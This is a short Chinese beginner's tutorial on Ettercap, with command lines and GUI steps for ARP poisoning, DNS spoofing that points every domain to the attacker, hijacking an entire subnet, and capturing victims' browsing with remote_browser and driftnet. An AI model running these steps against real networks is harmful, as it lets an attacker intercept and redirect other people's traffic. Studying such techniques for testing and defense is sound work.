Ettercap最初是交换局域网的嗅探器,但在开发过程中,它获得了越来越多的功能,从而使其转变为强大而灵活的中间人攻击工具。它支持许多协议(甚至是加密协议)的主动和被动解剖,并包括许多用于网络和主机分析的功能。
常用参数-T 文本模式( 通常情况下 -Tq一起使用)
-q安静模式
-G图形化模式
Dns劫持命令行用法
首先设置etter.dns
vi /etc/ettercap/etter.dns
添加
* A [劫持者的ip]
* PTR [劫持者的ip]
然后执行以下任意命令
1.ettercap -Tq -i eth0 /网关// /目标主机// -P dns_spoof
2.ettercap -i eth0 -Tq -P dns_spoof -M arp:remote /// ///(该方法可以劫持整个内网)
注解 : -i设置网卡
-P使用插件
-M执行mitm攻击,可以理解成arp攻击
图形化用法
步骤 1、选择网卡,关闭sniffing at starup。
2、扫描网段内的主机。
3、设置etter.dns:
vi /etc/ettercap/etter.dns
添加
* A [劫持者的ip]
* PTR [劫持者的ip]
4、Add to Target1 设置网关 Add to Target2 设置被劫持的机器。
5、启动ARP poisoning 。
6、添加dns_spoof插件 在Plugins中的Manage plugins中。
7、启动劫持。
拦截被劫持的浏览信息命令行用法
步骤
1、首先设置etter.dns,同dns劫持
2、ettercap -Tq -i eth0 /网关// /目标主机// -P remote_browser
3、劫持者的机器需开启driftnet -i eth0
注:方法和dns劫持基本一样只要把插件改成remote_browser就可以了,但是
只可以用以上一种命令,不可以整个网段劫持。
图形化用法
步骤
1、首先设置etter.dns,同dns劫持
2、方法同dns劫持_图形化用法,把dns_spoof插件改成remote_browser插件即可。
3、劫持者的机器需开启driftnet -i eth0
以上均为本人初学的学习理解如有错误敬请谅解并希望指出,本人拜谢



